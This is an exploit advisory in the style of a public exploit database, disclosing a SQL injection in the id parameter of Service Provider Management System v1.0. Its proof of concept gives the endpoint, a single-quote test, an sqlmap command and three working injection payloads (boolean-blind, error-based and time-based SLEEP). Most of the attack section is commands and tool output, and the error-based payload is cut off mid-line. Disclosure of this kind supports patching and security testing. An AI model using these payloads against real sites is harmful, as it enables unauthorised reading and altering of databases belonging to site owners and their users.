# Exploit Title: Service Provider Management System v1.0 - SQL Injection  
# Date: 2023-05-23  
# Exploit Author: Ashik Kunjumon  
# Vendor Homepage:  
# Software Link:  
# Version: 1.0  
# Tested on: Windows/Linux  
1. Description:  
Service Provider Management System v1.0 allows SQL Injection via ID  
parameter in /php-spms/?page=services/view&id=2  
Exploiting this issue could allow an attacker to compromise the  
application, access or modify data,  
or exploit the latest vulnerabilities in the underlying database.  
Endpoint: /php-spms/?page=services/view&id=2  
Vulnerable parameter: id (GET)  
2. Proof of Concept:  
Step 1 - By visiting the url:  
http://localhost/php-spms/?page=services/view&id=2 just add single quote to  
verify the SQL Injection.  
Step 2 - Run sqlmap -u " http://localhost/php-spms/?page=services/view&id=2"  
-p id --dbms=mysql  
SQLMap Response:  
Parameter: id (GET)  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: page=services/view&id=1' AND 8462=8462 AND 'jgHw'='jgHw  
Type: error-based  
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP  
BY clause (FLOOR)  
Payload: page=services/view&id=1' AND (SELECT 1839 FROM(SELECT  
(ELT(1839=1839,1))),0x7176786271,FLOOR(RAND(0)*2))x FROM  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: page=services/view&id=1' AND (SELECT 1072 FROM  
(SELECT(SLEEP(5)))lurz) AND 'RQzT'='RQzT